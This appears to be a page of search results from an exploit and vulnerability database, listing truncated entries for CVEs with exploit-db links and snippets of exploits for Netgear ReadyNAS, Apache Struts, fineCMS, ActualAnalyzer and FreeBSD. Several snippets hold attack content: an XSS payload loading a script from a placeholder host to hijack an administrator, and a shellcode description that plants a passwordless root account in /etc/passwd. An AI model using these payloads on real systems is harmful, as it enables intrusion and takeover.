52 matches found
Netgear ReadyNAS Surveillance 1.4.3-16 Remote Command Execution
Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE Date: 27.09.2017 Software Link: https://www.netgear.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: remote 1. Description $GET'uploaddir' is not escaped a...
CVE-2017-9430
creationtimestamp| type| source ---|---|--- 2017-06-05 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/42115...
CVE-2016-7894
...
Apache Struts 2 Jakarta Multipart Parser file upload command execution
Added: 03/16/2017 CVE: CVE-2017-5638 BID: 96729 Background Apache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller MVC architecture. Problem The Jakarta...
CVE-2016-9269
creationtimestamp| type| source ---|---|--- 2016-11-28 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/41361...
vlcms_v1. 2 getGameGift Sql injection vulnerability
No description provided by source...
CVE-2016-5845
creationtimestamp| type| source ---|---|--- 2016-08-10 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/40230...
CVE-2016-4206
creationtimestamp| type| source ---|---|--- 2016-07-13 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/40100...
CVE-2016-1794
creationtimestamp| type| source ---|---|--- 2016-06-10 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/39922...
CVE-2016-1011
creationtimestamp| type| source ---|---|--- 2016-05-06 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/39779 2025-08-31 03:01:30+00:00| seen| MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d...
CVE-2016-0122
creationtimestamp| type| source ---|---|--- 2016-04-14 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/39694...
CVE-2015-8644
creationtimestamp| type| source ---|---|--- 2016-02-19 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/39476...
CVE-2015-5995
creationtimestamp| type| source ---|---|--- 2015-09-03 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/41402...
fineCMS免费版xss getshell
简要描述: xss 详细说明: 注册一个用户,在发表文章的地方发表文章 在编辑器里加入一张图片 用firebug修改图片地址 加入onerror属性 onerror=document.body.appendChilddocument.createElement'script'.src='//xxx.xxx/a.js' 因为发表的文章需要后台管理员审核的, 当管理员审核的时候触发漏洞 然后是getshell 有了后台xss都好办 在修改版权处 保存以后 漏洞证明:...
ActualAnalyzer Lite 2.81 - Command Execution
ActualAnalyzer exploit. Tested on Lite version We load command into a dummy variable as we only have 6 characters to own the eval but load more as first 2 characters get rm'd. We then execute the eval with backticks. 11/05/2011 import urllib import urllib2 import sys import time def banner: print...
CVE-2014-5112
creationtimestamp| type| source ---|---|--- 2014-07-17 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/39352...
linux/x86 append "/etc/passwd" & exit() 107 bytes
No description provided by source. / appendpasswd.c Payload: Adds the string: toor::0:0:t00r:/root:/bin/bash to /etc/passwd thereby adding a password-less root account with login name toor Platform: linux/x86 Size: 107 bytes Author: $andman / / 08049054 start: 8049054: eb 38 jmp 804908e callfunc...
Pligg 1.1.2 - Blind SQL Injection and XSS Vulnerabilities
No description provided by source...
CVE-2013-7196
creationtimestamp| type| source ---|---|--- 2014-04-05 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/39139...
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
/ FreeBSD 9.0,1 mmap/ptrace exploit by Hunger Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... : Greetings to nohup, 2501, boldi, eax, johnnyb, kocka, op, pipacs, prof, sd, sghctoma, snq, spender, s2crew and others at hekkcamp: I hope we'll meet...